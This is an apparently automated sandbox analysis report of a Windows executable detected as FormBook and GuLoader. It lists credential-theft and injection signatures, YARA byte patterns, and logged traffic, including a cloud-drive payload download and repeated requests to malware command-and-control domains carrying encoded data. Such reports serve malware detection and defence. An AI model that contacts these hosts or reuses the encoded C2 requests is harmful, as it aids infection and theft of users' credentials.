Windows Analysis Report
fJuwM4Bwi7.exe

Overview

General Information

Sample name: fJuwM4Bwi7.exe
Analysis ID: 1451684
MD5: 0cb5485c0840cf976767bc45fb0b45d4
SHA1: 3eee45faada0a0ee309065cc279b6c38e6dd809b
SHA256: 82940860d0091481df6eb2a273504bd2066f83649ffd87dffe03582440a938cc
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • fJuwM4Bwi7.exe (PID: 8852 cmdline: "C:\Users\user\Desktop\fJuwM4Bwi7.exe" MD5: 0CB5485C0840CF976767BC45FB0B45D4)
    • fJuwM4Bwi7.exe (PID: 3344 cmdline: "C:\Users\user\Desktop\fJuwM4Bwi7.exe" MD5: 0CB5485C0840CF976767BC45FB0B45D4)
      • SLePhgUCFUcrYZVod.exe (PID: 2444 cmdline: "C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • secinit.exe (PID: 5436 cmdline: "C:\Windows\SysWOW64\secinit.exe" MD5: 3B4B8DB765C75B8024A208AE6915223C)
          • SLePhgUCFUcrYZVod.exe (PID: 2980 cmdline: "C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 9140 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: D1CC73370B9EF7D74E6D9FD9248CD687)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2a4d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
        No Sigma rule has matched
        No Snort rule has matched

        AV Detection

        Source: fJuwM4Bwi7.exeAvira: detected
        Source: www.innovtech.lifeSophos S4: Label: malware repository domain
        Source: http://www.innovtech.life/8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6Sophos S4: Label: malware repository domain
        Source: http://www.innovtech.life/8cwt/Sophos S4: Label: malware repository domain
        Source: www.innovtech.lifeVirustotal: Detection: 9%
        Source: fJuwM4Bwi7.exeReversingLabs: Detection: 52%
        Source: fJuwM4Bwi7.exeVirustotal: Detection: 55%
        Source: Yara matchFile source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: fJuwM4Bwi7.exeJoe Sandbox ML: detected
        Source: fJuwM4Bwi7.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.217.174:443 -> 192.168.11.30:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.217.215.132:443 -> 192.168.11.30:49843 version: TLS 1.2
        Source: fJuwM4Bwi7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SLePhgUCFUcrYZVod.exe, 00000009.00000000.79101394291.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp, SLePhgUCFUcrYZVod.exe, 0000000B.00000002.83830927716.0000000000A2E000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: secinit.pdbGCTL source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: fJuwM4Bwi7.exe, fJuwM4Bwi7.exe, 00000008.00000003.79086644486.0000000032739000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000003.79082655954.000000003258A000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002D2D000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79182431961.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, secinit.exe, 0000000A.00000002.83834030680.0000000002C00000.00000040.00001000.00020000.00000000.sdmp, secinit.exe, 0000000A.00000003.79178692892.00000000028A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: fJuwM4Bwi7.exe, 00000008.00000001.78926393304.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: secinit.pdb source: fJuwM4Bwi7.exe, 00000008.00000002.79181660044.0000000002688000.00000004.00000020.00020000.00000000.sdmp, fJuwM4Bwi7.exe, 00000008.00000002.79181660044.000000000267E000.00000004.00000020.00020000.00000000.sdmp, SLePhgUCFUcrYZVod.exe, 00000009.00000002.83832206009.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_0040603A FindFirstFileA,FindClose,5_2_0040603A
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_004055F6 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,5_2_004055F6
        Source: C:\Users\user\Desktop\fJuwM4Bwi7.exeCode function: 5_2_00402645 FindFirstFileA,5_2_00402645
        Source: Joe Sandbox ViewIP Address: 91.195.240.123 91.195.240.123
        Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jun 2024 12:18:53 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 2508Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jun 2024 12:18:56 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 2508Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 04 Jun 2024 12:18:59 GMTServer: ApacheX-Powered-By: PHP/8.1.28Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 2508Content-Type: text/html; charset=UTF-8
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1aR4Z8ZJ0aOrlWMPa0XiQ2Bvj5cArcFOq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=iQ4bGvtt1bUOdIMmx0FoKxyGgfNtaKfegGtnnpaIA0bWJs9Q4689zouPx5Y4+HL6T4TvrzgawqpIlVOGUgGREoTlcD3Zw3RnhErLbn743FaHB2O7toC+0mA=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.respirelavie.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=KAkr0JsC36DOGBdb86MaWw8oa5TA2XZrFg5SI4PSAqjqBay0+Mt9GFSkKu0kcsR0pRjPiVoCFffv9kAFnu4p94pvlKRDsoyD63jLrTdFBvrOG4BRdTojXfc=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.airportsurvery.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=SSpGlvD+1syJM+fS7Z8C1Cd2ZLeBmOr+68qPZxMelqgcCM6DsfmVmmLjkXM2/P+9S0q4oxoduwfupYzMqMwdcdYcBeP38sFbk5TUrAJPEOGdI/gD7BvPJp4=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.innovtech.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=wJjsrv+xTFW5EezvLu5DoT5e4On1D8g+dr15EOXITWTD1anv0RLrfGS01TvW8pCuGmfcOvvelUpztksk4WpfZfFxijTtARXG8NIL7Taa8Kq3eoSsUv86NcY=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.k4ryd.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=15acxp6jrOd/buvS9YLoVCwQt/eIj0wV8tP3YL3PMsIjyFVitYjgFC8LDxGQh6T0kTJLIrMUzadAXsDAGdfiNfgPYx4xbqKJILHq2u+5CghFrM1CdZcxiKw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.accentbathrooms.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.shun-yamagata.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=2L0w4dAlDepmBmTjVKMMeU7pTlJruWimQKtzQaHnPyexis6Apolau4+PRU3ZMaY44LgKCLzXfDRRDI6NjDrIa0AFdv/y2wt/s903kXPouMaZATl0JyX7k5A=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.brongal.byAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=8fvO6riwiNdGIieTsu/tMoq1+6O9galEvK05+Szv2OjuFl7+WHHAVTXMU1G96mraFYLMRcvsh+SJXHUnSCy+mSK3fOJTqBcOyoKopFv0eDv6jorQ0HypEvo=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.jdps.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=/eyPcvofDN2lSaRtaOy598Um2jV4WFkB8F+tj/gurFaBNg3fGC8Bq8tEkH7S9Bted1WP+/9Tvc8BBtdeQx/29+uX5MeVdplxqUx1gZhmZuS5o8pYgM2a/wg=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.belgravevilla.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=hBVPMRA8AXkfi8sX3ZU3xUlYATFWOWKaW/82pjFjYWbiYeLOxLODNY5T0HEKtdu9psozILhwOJRChZ+L+nmp0Ast2pFtgkKWXgnlG+28tA4JhCFPXI/mZUw=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.insist.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=ta/RVvqxwt03TPXWzdfJPt4x66UfuVsjNv5QpTaL8gP24YNLrE30I2eSxM0VtxXCv+eA5B8kQfuz0YxEkZl7phijUbluJOwzHO73Kb9kDKOg+aMKAT0Adgs=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.nurenose.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global trafficHTTP traffic detected: GET /8cwt/?24eluX=JIyO8Gc0ZaCUBC4gwloHiifCYtv01LSxCuL3sMDgSuZIErE9iBbFukGcMyuYgIJjP33nSDseYz7bP5VCvKNEdyHwbE4qu9h+y1aodMHm9WSOLrl68ngvcME=&Mjnd0=JZHP8Tx0t6 HTTP/1.1Host: www.cd14j.usAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: unknown HTTP traffic detected: POST /8cwt/ HTTP/1.1 Host: www.airportsurvery.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Origin: http://www.airportsurvery.com Referer: http://www.airportsurvery.com/8cwt/ Content-Type: application/x-www-form-urlencoded Connection: close Cache-Control: no-cache Content-Length: 203 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:15:42 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:15:44 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:15:47 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:15:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:17:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:17:46 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:17:48 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Tue, 04 Jun 2024 12:17:51 GMT Content-Type: text/html Content-Length: 571 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:18:01 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:18:04 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:18:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: W/"afe-6014d9a904f4f" Content-Encoding: gzip
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 04 Jun 2024 12:18:09 GMT Content-Type: text/html Content-Length: 2814 Connection: close Vary: Accept-Encoding Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT ETag: "afe-6014d9a904f4f"
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:18:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: 2cc_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://brongal.by/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache content-encoding: gzip vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:18:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: 2cc_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://brongal.by/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache content-encoding: gzip vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:18:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-powered-by: PHP/7.4.33 x-litespeed-tag: 2cc_HTTP.404 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 link: <https://brongal.by/wp-json/>; rel="https://api.w.org/" x-litespeed-cache-control: no-cache content-encoding: gzip vary: Accept-Encoding x-turbo-charged-by: LiteSpeed
3b 23 73 6c 4c 13 1c cf b4 93 6b ed a7 4c 7a 2e 53 ad 9f f5 3e 2f 02 fd af e9 da 4f 79 c9 fe cb 6b ed a7 80 43 eb 6b 5f 92 f1 33 3f 25 90 e9 7b 4a bd 31 e7 aa 39 be aa bf 7d 41 c6 40 ba a6 6b 8b 24 28 2f a3 e9 1a 6b 58 5f 93 0d d2 35 8f f0 e6 f8 51 a8 f5 35 4d d7 e2 c5 38 f0 e9 8c 24 5a ff 7a 07 ba 28 99 e2 d0 ff 8a 35 5c 5b ea 5a 1c c1 88 f0 71 f0 be 0b bc d0 54 f2 9f 11 9c b8 33 91 a1 6b 29 4e a6 24 65 e0 45 fb 3e 0a d3 e4 ea f3 c8 0f 53 4e fe 73 32 8f 03 9c 42 d3 a5 50 2a 4d 7d 8f 0e af 29 03 39 4a 49 32 1f d1 34 f1 c3 e9 12 a8 f8 e5 82 24 57 86 1f c6 0b 60 6f 42 7e b9 f0 13 e2 21 36 88 36 ab 68 cb 57 ba e6 87 4f 70 38 5d e0 29 60 e3 6a 61 a9 e7 ac ff 4c 6d e7 2e fe 17 18 92 31 7a f5 5f 57 df ac 7e bb fa fe cd af 56 df af 7e b7 fa 6e f5 3d 8c 8e 7f 5c 7d f3 e6 df ae be 35 de fc d5 9b 5f af be 59 fd ee cd df ac fe f7 ea 1b 74 aa ad fe 33 2b f8 dd ea b7 ab 6f 56 ff 74 0a fd b1 ab 37 83 68 1a a9 7c fc 64 8e a7 e4 b3 f1 19 71 81 91 Data Ascii: 33cb}kFfC&%7l4veHfF(,Z
        Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden content-length: 93 cache-control: no-cache content-type: text/html connection: close Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
        Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 04 Jun 2024 12:20:27 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
